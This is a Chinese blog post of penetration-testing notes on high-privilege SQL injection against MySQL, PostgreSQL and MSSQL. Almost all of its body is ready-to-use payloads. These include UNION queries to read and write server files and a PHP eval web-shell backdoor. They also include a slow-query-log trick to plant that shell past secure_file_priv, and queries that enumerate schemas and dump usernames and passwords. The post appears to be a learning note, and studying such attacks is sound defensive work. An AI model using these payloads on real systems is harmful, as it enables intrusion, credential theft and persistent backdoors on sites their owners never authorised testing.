SQL注入(二)mysql、PostgreSQL、MSSQL

最新推荐文章于 2024-03-18 11:21:04 发布
最新推荐文章于 2024-03-18 11:21:04 发布
阅读量409 收藏
点赞数
分类专栏: 基础的渗透测试 文章标签: 数据库 postgresql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/127154951
版权

最高权限(root)读取写入操作

读取文件:load_file('d:/1.txt')

写入文件:http://127.0.0.1/b/?id=1%20union%20select%201,%E2%80%98yyy%E2%80%99,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20into%20outfile%20%27d:/3.txt%27

菜刀后门代码:<?php eval($_POST['x']);?> 连接密码为x

MYSQL-root高权限读写注入

-读取文件:

UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

-写入文件:

UNION SELECT 1,'xxxx',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile 'd:/www.txt'

-路径获取:phpinfo,报错,字典等

-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过

set global slow_query_log=1;

set global slow_query_log_file='shell路径';

select '<?php eval($_GET[A])?>' or SLEEP(1);

PostgreSQL-高权限读写注入

-测列数:

order by 4

and 1=2 union select null,null,null,null

-测显位:第23

and 1=2 union select 'null',null,null,null 错误

and 1=2 union select null,'null',null,null 正常

and 1=2 union select null,null,'null',null 正常

and 1=2 union select null,null,null,'null' 错误

-获取信息:

and 1=2 UNION SELECT null,version(),null,null //版本号

and 1=2 UNION SELECT null,current_user,null,null //当前用户

and 1=2 union select null,current_database(),null,null //数据库名

-获取数据库名:

and 1=2 union select null,string_agg(datname,','),null,null from pg_database

-获取表名:

  1. and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'

string_agg(tablename,',') 将tablename的名字显示出来,分割符为,

2and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

-获取列名:

and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'

-获取数据:

and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

-补充-获取dba用户(同样在DBA用户下,是可以进行文件读写的):

and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE

参考:https://www.freebuf.com/sectool/249371.html

MSSQL-sa高权限读写执行注入

-测列数:

order by 4

and 1=2 union all select null,null,null,null

-测显位:

and 1=2 union all select null,1,null,null

and 1=2 union all select null,null,'s',null

-获取信息:

@@version 获取版本信息

db_name() 当前数据库名字

user、system_user,current_user,user_name 获取当前用户名

@@SERVERNAME 获取服务器主机信息

and 1=2 union all select null,db_name(),null,null

-获取表名:

and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null

union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

-获取列名:

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null

-获取数据:

and 1=2 union all select null,username, password ,null from manage

大飞先生
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
suql:Sugar SQL MySQL PostgreSQL PostgreSQL MSSQL Oracle NoSQL
02-04
SQL这是什么? SuQL是SQL的语法糖。这是如何运作的?...你为什么需要这个? 一次编写查询,用于每个DBMS。 编写易于阅读和编写的查询。...$ suql = ( new SuQL )-> setAdapter ( 'mysql' );$ sql =
sql注入sqlmap全详细
qq_41620273的博客
12-25 3550
sql注入sqlmap SQL注入危害: SQL注入分类: 1.基于注入点分类:get注入、post注入、cookie注入 2.基于变量数据类型: 字符型、数字型注入 3.基于获取数据类型方法: 基于回显(查询结果直接显现)、基于错误(由于配置的原因,包错日志原本因该打印到日志文件夹中,却直接输出到了网页页面上来了)、盲注(布尔盲注、时间盲注) 数字型: 布尔盲注: 在id=1后拼接 and 1=1或者 and 1=2; 判断是true或者false 时间盲注:在id=1后拼接
Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1827
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
【web安全】——基于SQL注入拿到webshell
Demo不是emo的博客
11-20 4846
今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天写一篇博客来巩固一下这方面的知识,希望对您们也有帮助
网络安全之Sql注入sqlmap
weixin_44277013的博客
08-07 1960
SQL注入漏洞从1998年圣诞节大火以来,长盛不衰,虽然开发人员想出各种方法对它进行围追堵截,却始终不能赶尽杀绝,sql注入的根本原因就是将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。
FRP+MSF+注入反弹shell
dahege666的博客
04-21 4241
实验环境: XXX云ECS一台:x.x.x.x 内网kali控制端:192.168.250.133 外网注入后台win7主机: 操作步骤: 分别在XXX云ECS、内网kali控制端搭建frp 具体方法参见: 安装frp_叶孤心丶的博客-CSDN博客_frp安装 配置 内网kali控制端配置 vi frpc.ini XXX云ECS配置 vim frps.ini 启动FRP 本地Kali linux 启动 FRP ./frpc -c ./f...
数据库管理工具 支持MYSQL MSSQL PostgreSQL SQLIte ETCD
05-09
在提供的标题和描述中,提到了几种主要的数据库系统:MYSQLMySQL)、MSSQL(Microsoft SQL Server)、PostgreSQLSQLite,以及ETCD,这是一个分布式键值存储系统,通常用作服务发现和配置管理。接下来,我们将...
清晰:AdonisJS官方SQL ORM。 支持PostgreSQLMySQL,MSSQL,Redshift,SQLite等
01-30
本文将深入探讨Lucid的功能、特性以及如何与各种SQL数据库(如PostgreSQLMySQL,MSSQL,Redshift和SQLite)配合使用。 首先,让我们了解ORM的概念。ORM是一种编程技术,它允许开发者使用面向对象的语言来操作...
mysql-sqlserver-postgresql-jar包.rar
04-26
在Java编程环境下,开发人员常常需要连接不同的数据库系统,如MySQLSQL Server和PostgreSQL。本文将详细介绍如何使用指定的jar包来建立这些数据库与Java应用程序之间的连接。 首先,我们来看标题中的"mysql-sql...
HeidiSQL一个用于管理MySQL,MSSQLPostgreSQL的图形客户端-python
06-18
HeidiSQL一个用于管理MySQL,MSSQLPostgreSQL的图形客户端,用Delphi编写HeidiSQL HeidiSQL 是一款有用且可靠的工具,专为使用流行的 MySQL 服务器、Microsoft SQL 数据库PostgreSQL 的 Web 开发人员设计。...
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
m0_65336233的博客
10-08 434
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
第25天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
wuqingsix的博客
11-17 347
Access无高权限注入点-只能猜解,还是暴力猜解 ,因为其中只有一个用户权限MYSQLPostgreSQL,MSSQL高权限注入点-可升级读写执行等高权限由来:当前的脚本采用的是高权限用户链接的数据库,当前产生注入点的话就是高权限使用load_file()函数读取文件内容。
PostgreSQL 高权限命令执行 (CVE-2019-9193)
qq_44657899的博客
10-08 1051
漏洞原理 PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下最常用的数据库,但同时也提供了Windows及Linux操作系统版本。(Kali下Metasploit用的就是PostgreSQL数据库). 漏洞成因是因为PostgreSQL的特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3-11.2版本中这个特性是默认开启的。 从9.3版本开始PostgreSQL实现了COPY TO/FROM PROGRAM这个新的功能,它允许数.
十五天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
m0_51322401的博客
01-31 617
分为盘符绝对路径和网址绝对路径盘符绝对路径:顾名思义如图:网址绝对路径:网址的路径,如下图-路径获取:phpinfo,报错,字典等-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过set global slow_query_log_file=‘shell路径’;select '
sql注入之高权限注入和文件读写
小阿宁的猫猫
09-12 757
高权限注入-- 1.多个网站共享mysql服务器-- 2.MySQL 权限介绍-- 3.注入流程-- 查询所有数据库名称-- 查询表名对应的字段名-- 查询数据-- 文件读写-- 1.文件读写注入的原理-- 2.文件读写注入的条件-- 3.读取文件-- 4.写入文件--
数据库工具 PostgreSQLSQL Server:有什么区别?
最新发布
励志做最业余的专业博主,控件产品可以私我~
03-18 2153
本文深入比较了两个著名的数据库管理系统:Microsoft SQL Server 和 PostgreSQL。我们将探讨它们的共同特征、区别、用例以及各自的优缺点。
postgresql 判断字段的长度
cuisidong1997的博客
03-16 3504
select DISTINCT lxbh from “20190816183245_ld_lxbh_2018” WHERE CHAR_LENGTH(“lxbh”)=5 查询出所有lxbh列的值长度为5的数据。postgresql 判断字段的长度。
pg与msql数据库调研对比分析
不积跬步,无以至千里;不积小流,无以成江海。
08-10 388
简介 MySQL的口号是“世界上最流行的开源关系型数据库”,而PostgreSQL的Slogan则是“世界上最先进的开源关系型数据库”,一看这两位就是老冤家了。我认为这两个口号很好的反映出了两种产品的性质:PostgreSQL是功能丰富,一致性优先,高大上的严谨的学院派数据库MySQL是功能粗陋,可用性优先,糙猛快的“工程派”数据库。 流行度本身是一种优势,越流行用户基数就越大,生态就越繁荣。用户基数大,再丑也能整容整出来。但一个东西流不流行往往并不取决于其质量,最流行的东西有时候还往往比较垃圾,Java
2017-11-03-SQLMAP使用方法笔记
PFinal社区
11-03 210
layout title date author desc in_head post SQLMAP使用方法笔记 2017-11-03 09:03:02 +0800 Q九转 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库MySQL, Oracle,...
SQL注入全面解析:MySQL、MSSQL与ACCESS差异与检测方法
此外,还提到了针对不同数据库类型的注入,如SQL(如Oracle、MySQL、MSSQL、Access、SQLite和PostgreSQL)和NoSQL数据库(如MongoDB、Redis)的区别。 对于MySQL、MSSQL和ACCESS这三种常见数据库,文章着重指出了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值